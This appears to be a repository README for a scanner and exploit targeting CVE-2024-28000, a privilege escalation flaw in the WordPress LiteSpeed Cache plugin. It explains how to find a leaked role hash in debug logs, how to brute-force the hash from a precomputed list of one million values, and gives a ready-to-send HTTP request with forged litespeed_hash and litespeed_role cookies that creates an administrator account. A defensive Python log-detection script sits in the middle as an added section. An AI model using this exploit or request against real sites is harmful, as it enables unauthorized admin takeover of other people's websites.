CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp

SSSSuperX/CVE-2024-28000

LiteSpeed Cache Privilege Escalation Exp

CVE-2024-28000_Scan.py

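  • The script first identifies the plugin version and determines whether it is a vulnerable version, then tries to confirm whether the log file exists. If it does, the script sends a request and then requests the log file again to look for a leaked hash. If LiteSpeed has debug enabled, the correct hash may be leaked.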
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808

Example:

09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init

If LiteSpeed has debug enabled, you may see log entries like the ones above, in which pkHrfD is the correct hash.
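Defender-side use of the log format above, as an added example that is not part of the original repository: it parses debug-log lines for `[Router] hash not match` entries and flags clients that submit many different `litespeed_hash` values within a short window. The sample log, the client addresses, the threshold and window, and the month/day/year timestamp order are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the debug-log format shown above (documentation-range addresses).
SAMPLE_LOG = """\
09/08/24 16:30:38.231 [203.0.113.7:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [203.0.113.7:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.610 [203.0.113.7:26010 1 aB3] [Router] hash not match Qx81Lm != pkHrfD
09/08/24 16:30:39.004 [203.0.113.7:26011 1 k9Z] [Router] hash not match 0dTT4e != pkHrfD
09/08/24 16:31:02.500 [198.51.100.20:40112 1 Pq2] [Router] hash not match aaaaaa != pkHrfD
09/08/24 16:31:05.100 [198.51.100.20:40113 1 Pq3] [Optm] init
"""

# timestamp, [client:port pid id], then the role-validation mismatch message
LINE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d \d\d:\d\d:\d\d\.\d{3}) "
    r"\[(?P<ip>[^\]\s]+):\d+ \S+ \S+\] "
    r"\[Router\] hash not match (?P<sent>\S+) != (?P<expected>\S+)\s*$")

def find_hash_guessing(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return (alerts, exposed): alerts maps client -> most distinct wrong hashes
    seen inside `window`; exposed is True if the log records the expected hash."""
    events = defaultdict(list)
    exposed = False
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        exposed = True  # every mismatch line writes the expected hash to disk
        ts = datetime.strptime(m["ts"], "%m/%d/%y %H:%M:%S.%f")  # assumed m/d/y order
        events[m["ip"]].append((ts, m["sent"]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over this client's attempts
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = {sent for _, sent in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts, exposed

if __name__ == "__main__":
    print(find_hash_guessing(SAMPLE_LOG))
```

When `exposed` is true, the log file itself holds the value being guessed, so debug logging should be turned off or the log made unreachable over the web.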

CVE-2024-28000_Exploit.py

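  • Testing showed that the hashes generated by Python and by PHP differ, so the hash list cannot be simulated with Python. Hash_list.txt contains 1000000 hashes generated with PHP, so in theory at most 1000000 iterations are needed to reach the correct hash.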
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
  • -d is the hash list, -u is the URL and -t is the number of threads; a high thread count is not recommended.

Testing

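  • In a lab environment the hash could be enumerated successfully, and across five reinstalls it was confirmed each time that the hash was in the generated hash list; however, several factors indicate that the success rate in real-world exploitation is low.
  • After the correct hash has been found, the following request can be used to add an admin user: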
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=<correct hash>; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}
